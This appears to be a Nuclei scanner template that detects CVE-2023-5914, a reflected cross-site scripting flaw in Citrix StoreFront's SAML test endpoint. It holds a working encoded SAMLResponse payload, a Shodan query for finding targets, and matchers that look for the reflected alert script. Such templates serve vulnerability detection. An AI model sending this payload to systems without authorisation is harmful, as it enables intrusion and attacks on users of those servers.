45 lines
1.8 KiB
YAML
45 lines
1.8 KiB
YAML
id: CVE-2023-5914
|
|
|
|
info:
|
|
name: Citrix StoreFront - Cross-Site Scripting
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: |
|
|
Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.
|
|
reference:
|
|
- https://www.assetnote.io/resources/research/continuing-the-citrix-saga-cve-2023-5914-cve-2023-6184
|
|
- https://support.citrix.com/article/CTX583759/citrix-storefront-security-bulletin-for-cve20235914
|
|
- https://www.youtube.com/watch?v=t8MeUQrPqec
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-5914
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-5914
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00046
|
|
epss-percentile: 0.14154
|
|
cpe: cpe:2.3:a:cloud:citrix_storefront:*:*:*:*:ltsr:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: cloud
|
|
product: citrix_storefront
|
|
shodan-query: html:"/Citrix/StoreWeb"
|
|
tags: cve,cve2024,xss,citrix,storefront
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/Citrix/teststoreAuth/SamlTest"
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
body: "SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains_all(body, "<script>alert(1)</script>", "XmlException")'
|
|
condition: and
|
|
# digest: 4b0a00483046022100c444c81b2b8b8c7685a7c8b6561444155245452a96458ce4ababf2b07efd197a022100cca7f9aa78063d40421d7bb070c601a698b3c6ea172e211040abb4bd0bb804e4:922c64590222798bb761d5b6d8e72950
|